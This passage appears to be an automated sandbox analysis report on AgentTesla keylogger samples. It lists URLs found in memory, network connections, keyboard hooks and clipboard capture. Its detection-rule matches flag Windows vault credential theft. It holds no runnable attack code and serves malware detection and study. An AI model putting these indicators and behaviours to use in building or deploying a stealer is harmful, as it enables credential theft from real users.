                    Source: s2Jg1MAahY.exe, 00000000.00000002.1773290594.0000000003115000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.0000000003251000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1852262660.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2976437638.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000F.00000002.1915348802.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.2978687835.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1995497677.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2977002334.0000000002B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000000.00000002.1780145389.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1854063501.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1854063501.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2968037571.0000000000437000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 0000000F.00000002.1918087486.0000000005023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.0000000003251000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2968040431.0000000000436000.00000040.00000400.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1854063501.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 00000009.00000002.1854063501.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2976437638.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000F.00000002.1918087486.0000000005023000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.2978687835.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2977002334.0000000002B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2977044627.0000000003251000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2976437638.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.2978687835.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2977002334.0000000002B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2977044627.0000000003251000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2976437638.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.2978687835.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2977002334.0000000002B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: s2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/
                    Source: s2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx$AccountNameRequestphttps://api.libertyreserve.c
                    Source: s2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx%AccountNameRequestqhttps://api.libertyreserve.c
                    Source: GedTanqRR.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspx
                    Source: GedTanqRR.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
                    Source: GedTanqRR.exe.0.drString found in binary or memory: https://sci.libertyreserve.com/
                    Source: s2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49758 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\s2Jg1MAahY.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\GedTanqRR.exe
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Source: 15.2.sgxIb.exe.505fdb0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.sgxIb.exe.505fdb0.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 9.2.GedTanqRR.exe.4c3d218.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.GedTanqRR.exe.4c3d218.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.s2Jg1MAahY.exe.4aceda0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.s2Jg1MAahY.exe.4aceda0.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.s2Jg1MAahY.exe.4a92580.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.s2Jg1MAahY.exe.4a92580.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 9.2.GedTanqRR.exe.4c79a38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.GedTanqRR.exe.4c79a38.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 15.2.sgxIb.exe.5023590.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.sgxIb.exe.5023590.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.s2Jg1MAahY.exe.4aceda0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.s2Jg1MAahY.exe.4aceda0.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 15.2.sgxIb.exe.5023590.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.sgxIb.exe.5023590.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 9.2.GedTanqRR.exe.4c79a38.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.GedTanqRR.exe.4c79a38.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.s2Jg1MAahY.exe.4a92580.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.s2Jg1MAahY.exe.4a92580.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 9.2.GedTanqRR.exe.4c3d218.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.GedTanqRR.exe.4c3d218.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 15.2.sgxIb.exe.505fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 15.2.sgxIb.exe.505fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_0143D57C0_2_0143D57C
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A541800_2_07A54180
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A52B580_2_07A52B58
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A54A800_2_07A54A80
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A5C7300_2_07A5C730
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A5353A0_2_07A5353A
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A535480_2_07A53548
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A5C2F80_2_07A5C2F8
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A5E2100_2_07A5E210
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A541700_2_07A54170
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A531400_2_07A53140
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A531500_2_07A53150
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A550210_2_07A55021
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A500230_2_07A50023
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A550300_2_07A55030
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A500400_2_07A50040
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A52FAA0_2_07A52FAA
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A5BEC00_2_07A5BEC0
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A52E020_2_07A52E02
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A52E100_2_07A52E10
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A5DDD80_2_07A5DDD8
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A52B4A0_2_07A52B4A
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A54A710_2_07A54A71
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A539080_2_07A53908
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_07A538F80_2_07A538F8
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_0ED530780_2_0ED53078
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_018E41988_2_018E4198
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_018EE9F88_2_018EE9F8
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_018E4A688_2_018E4A68
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_018E3E508_2_018E3E50
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DAC76C8_2_06DAC76C
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DA55DA8_2_06DA55DA
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DA55E88_2_06DA55E8
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DB56A88_2_06DB56A8
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DB67008_2_06DB6700
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DB35788_2_06DB3578
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DB7E908_2_06DB7E90
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DB77B08_2_06DB77B0
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DB27498_2_06DB2749
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DBE4C88_2_06DBE4C8
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DB00408_2_06DB0040
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DB5DF78_2_06DB5DF7
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_06DB003F8_2_06DB003F
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0180D57C9_2_0180D57C
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_076B03189_2_076B0318
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_076B03189_2_076B0318
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_076B03139_2_076B0313
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E2B589_2_0B5E2B58
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E4A809_2_0B5E4A80
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E41809_2_0B5E4180
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E2B4B9_2_0B5E2B4B
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E4A719_2_0B5E4A71
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E39089_2_0B5E3908
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E38F89_2_0B5E38F8
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E2E109_2_0B5E2E10
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E2E039_2_0B5E2E03
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5EBEC09_2_0B5EBEC0
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5EDDD89_2_0B5EDDD8
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5EE2109_2_0B5EE210
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5EC2F89_2_0B5EC2F8
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E31509_2_0B5E3150
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E31409_2_0B5E3140
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E41709_2_0B5E4170
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E00409_2_0B5E0040
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E00069_2_0B5E0006
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E50309_2_0B5E5030
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E50219_2_0B5E5021
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5EC7309_2_0B5EC730
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E35489_2_0B5E3548
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E353B9_2_0B5E353B
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_02C34A6813_2_02C34A68
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_02C3E9F813_2_02C3E9F8
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_02C33E5013_2_02C33E50
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_02C3AF3713_2_02C3AF37
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_02C3419813_2_02C34198
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A456A813_2_06A456A8
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A47E9013_2_06A47E90
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A4670013_2_06A46700
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A4357813_2_06A43578
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A477B013_2_06A477B0
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A4E78813_2_06A4E788
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A4271813_2_06A42718
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A45DF713_2_06A45DF7
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A4004013_2_06A40040
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_06A4003E13_2_06A4003E
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_01A0D57C15_2_01A0D57C
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B80031815_2_0B800318
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B8024A015_2_0B8024A0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B80031815_2_0B800318
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B80030815_2_0B800308
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B822B5815_2_0B822B58
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82418015_2_0B824180
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B822B4A15_2_0B822B4A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B824A8015_2_0B824A80
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B824A7115_2_0B824A71
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82390815_2_0B823908
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B8238F815_2_0B8238F8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82BEC015_2_0B82BEC0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B822E0215_2_0B822E02
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B822E1015_2_0B822E10
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82DDD815_2_0B82DDD8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82C2F815_2_0B82C2F8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82E21015_2_0B82E210
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82314015_2_0B823140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82315015_2_0B823150
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82417015_2_0B824170
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82000715_2_0B820007
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82502115_2_0B825021
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82503015_2_0B825030
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82004015_2_0B820040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82C73015_2_0B82C730
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82353A15_2_0B82353A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_0B82354815_2_0B823548
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_01874A6819_2_01874A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_0187AC8019_2_0187AC80
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_01873E5019_2_01873E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_0187419819_2_01874198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_0187E9C319_2_0187E9C3
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06ECC3FC19_2_06ECC3FC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06EC52A819_2_06EC52A8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06EC52A219_2_06EC52A2
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06ED670819_2_06ED6708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06ED358019_2_06ED3580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06ED004019_2_06ED0040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06ED77B819_2_06ED77B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06EDE4D019_2_06EDE4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06ED5E1019_2_06ED5E10
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_02A2D57C22_2_02A2D57C
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_05156BE022_2_05156BE0
